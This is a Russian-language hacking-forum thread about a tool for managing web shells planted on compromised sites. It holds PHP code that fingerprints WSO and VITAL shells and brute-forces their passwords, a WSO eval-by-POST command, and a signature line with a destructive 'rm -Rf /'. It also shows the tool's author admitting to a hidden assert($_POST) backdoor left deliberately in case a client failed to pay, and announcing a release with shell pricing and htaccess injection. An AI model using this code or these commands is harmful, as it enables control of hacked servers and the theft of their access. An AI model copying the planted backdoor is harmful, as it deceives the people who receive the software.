Вернуться   RDot > RDot.org > Релизы/Releases

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 23.11.2010, 14:20   #11
Boddhisatva
 
Регистрация: 23.11.2010
Сообщений: 1
Репутация: 0
По умолчанию

Как вариант - брать незапароленный WSO, и немного модифицировать его, чтобы работал только, например, при if($_GET['wso']=='launch'), или как там. И эту строку в настройках прописать.
Хоть какая-то безопасность от посторонних глаз.
Boddhisatva вне форума   Ответить с цитированием
Старый 15.12.2010, 23:34   #12
Acez666
 
Аватар для Acez666
 
Регистрация: 13.12.2010
Сообщений: 10
Репутация: 1
По умолчанию

досю себя в netstat ничего нету и в логах апатча. не досит чтоли?
Acez666 вне форума   Ответить с цитированием
Старый 16.12.2010, 00:07   #13
Acez666
 
Аватар для Acez666
 
Регистрация: 13.12.2010
Сообщений: 10
Репутация: 1
По умолчанию

а не поперло, надо 600 потоков ставить.
Acez666 вне форума   Ответить с цитированием
Старый 26.12.2010, 18:50   #14
dasknix
 
Аватар для dasknix
 
Регистрация: 30.07.2010
Сообщений: 20
Репутация: 0
По умолчанию

про защищенные (не обязательно пассами, можно создать свой способ):

увидел тут на днях шелвизард и дофига чего не устроило, хз, может я претенционзен,
либо сабжевый sh wiz ещё слишком молод. в любом случае спасибо автору, т.к. несмотря
на то что идея создать shm для автоматизации и управления была давно.. ну вы сами
знаете - идей дофига а на практике по проекту в полгода дай бог рожаем

написал свой, собссно пару фрагов кода, весь выложить не могу, за EP считаем shdet()
PHP код:
// sh pattz
    
$shpats = array(
         
T_VITAL =>    array(
             
def => array('<title>VITAL</title>')
            ,
auth => array(
                 
'input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}'
                
,'<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">'
             
)
            ,
auth_answ => array(
                 
'<meta http-equiv="refresh" content="1;URL='
                
,'<a style="font:12px Verdana" href="'
                
,'">Success</a>'
             
)
         )
        ,
T_WSO => array(
             
def => array("BOFF 1.0")
            ,
auth => array(
                 
"<pre align=center><b>Authorization</b><br>"
                
,"0ff \/\/"
                
,"<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
            
)
         )
        
#,T_CMAD => ""
        #,T_R57 => ""
    
); 
PHP код:
function shdet(array $sh){
    global 
$shpats;
    global 
$pwdz;
    global 
$shz;

    
$buf nw_get(M_GET$sh[url]);

    foreach(
$shpats as $shpat_type => $shpat){
        if(
inarr($shpat[def],$buf)){
            
mod($sh,    AUTH_NO,        auth,need);
            
mod($sh,    $shpat_type,    type);
            
mod($sh,    ONLINE,            status);
            
/*
                $shz[$sh[id]][auth][need]    = AUTH_NO;
                $shz[$sh[id]][type]            = $shpat_type;
                $shz[$sh[id]][status]        = ONLINE;
                $shz[$sh[id]][update]        = ONLINE;
            */
            
return true;
        }
    }

    foreach(
$shpats as $shpat_type => $shpat){
        foreach(
$shpat[auth] as $auth_pat){
            if(
strpos($buf$auth_pat) !== false){
                global 
$cookie;

                
$shz[$sh[id]][type] = $shpat_type;
                
$sh[type] = $shpat_type;
                
$shz[$sh[id]][auth][need] = AUTH_USE;

                
// auth to sh with current shpat type
                    
foreach($pwdz as $pw){
                        
$auth_answ make_auth($sh$pw);
                        if(
$shpats[$shpat_type][auth_answ][0])
                            
$auth inarr($shpats[$shpat_type][auth_answ], $auth_answ) ? OK false;
                        else
                            
$auth inarr($shpats[$shpat_type][def], $auth_answ) ? OK false;

                        if(
$auth){
                            
$shz[$sh[id]][auth][state] = OK;
                            
$shz[$sh[id]][auth][pw] = $pw;
                            
$shz[$sh[id]][auth][cook] = $cookie $cookie null;
                            return 
true;
                        }
                        global 
$auth_delay;
                        
sleep($auth_delay);
                    }
                
//

                
if(!$auth$shz[$sh[id]][auth][state] = FAIL;
                return 
true;
            }
        }
    }

    return 
false;

PHP код:
function make_auth(array $sh$pw){
    global 
$shz;

    
cook($sh);

    switch(
$shz[$sh[id]][type]){        // don' use local old $sh!
        
case T_VITAL:
            
$nwreq_method    M_POST;
            
$nwreq_fpath    $sh[url];
            
$nwreq_postargs    = array(
                                        
'doing'        => 'login'
                                    
,    'password'    => $pw
                                    
);
            
# $cookie        = array('phpspypass'    => $pw);

            
return nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case 
T_WSO:
            
$nwreq_method    M_POST;
            
$nwreq_fpath    $sh[url];
            
$nwreq_postargs    = array('pass'    => $pw);
            
            return 
nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case 
T_CMAD:
        break;
        case 
T_R57:
        break;
        default:
            return 
false;
    }

само собой делаем регексы, паттерны что
выше по strpos() сделаны на скорую руку
__________________
[r@/]# rm -Rf / --no-recover
dasknix вне форума   Ответить с цитированием
Старый 25.03.2011, 05:33   #15
spiderbuber
 
Регистрация: 18.02.2011
Сообщений: 9
Репутация: 0
По умолчанию

Также при чеке ошибка:
Цитата:
(12:09:42) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 X:\home\shwizard\www\includes\func.shell.php (line 61)
Пробовал на разных шеллах. Как поправить регулярку?

Хотелось бы увидеть в новой версии возможность чека не только ПР, но и ТИЦ + Стату ЛИ.РУ а также добавить несколько полей для произвольных меток и комметариев.
spiderbuber вне форума   Ответить с цитированием
Старый 09.12.2011, 06:32   #16
Cuko
 
Регистрация: 12.11.2010
Сообщений: 15
Репутация: 2
По умолчанию

не работает скрипт=\ делаю на локал хосте, в xampp, не добавляет более одного шелла за раз, а по одному не айс как то.
Cuko вне форума   Ответить с цитированием
Старый 11.12.2011, 16:41   #17
curlbaby
 
Регистрация: 14.09.2011
Сообщений: 5
Репутация: 0
По умолчанию

для WSO с паролем достаточно передать его по POST, как пример:

Цитата:
Сообщение от Nightmare Посмотреть сообщение
5) eval POST: a=Php&p1=[evalcode]

5) eval POST: pass=password&a=Php&p1=[evalcode]
curlbaby вне форума   Ответить с цитированием
Старый 24.12.2011, 16:04   #18
(dm)
 
Аватар для (dm)
 
Регистрация: 05.07.2010
Сообщений: 58
Репутация: 86
Talking

Мне понравилась 33 строчка index.php:
Цитата:
if(!empty($_POST['pass']) && !assert($_POST['pass']))die();
(dm) вне форума   Ответить с цитированием
Старый 25.12.2011, 14:57   #19
M_script
 
Регистрация: 06.07.2010
Сообщений: 113
Репутация: 33
По умолчанию

Цитата:
Сообщение от (dm)
Мне понравилась 33 строчка index.php
Так вот что означают слова "вместе c Dr.Z3r0" в названии темы.
M_script вне форума   Ответить с цитированием
Старый 28.12.2011, 17:11   #20
Dr.Z3r0
 
Аватар для Dr.Z3r0
 
Регистрация: 05.07.2010
Сообщений: 101
Репутация: 156
По умолчанию

Цитата:
Сообщение от (dm) Посмотреть сообщение
Мне понравилась 33 строчка index.php:
упс, дико извиняюсь) осталось от старых версий))
тулза разрабатывалась на заказ, с заказчиком работал впервые поэтому был оставлен бекдор на случай если заказчик кинет.
я уже забыл про него

еще раз извиняюсь, я не спецом, серьезно)

UPD:
И дабы загладить свою вину, выкладываю новую версию 5.0. Изменения:
Цитата:
С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!
PS: в ней бекдоров нету... вроде...))
__________________
На просьбы о помощи в sql-injection в ПМ не отвечаю. Для этих вопросов есть специальные темы.
Dr.Z3r0 вне форума   Ответить с цитированием
Ответ

Метки
веб шеллы, manager, tools, web shells, wizard

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot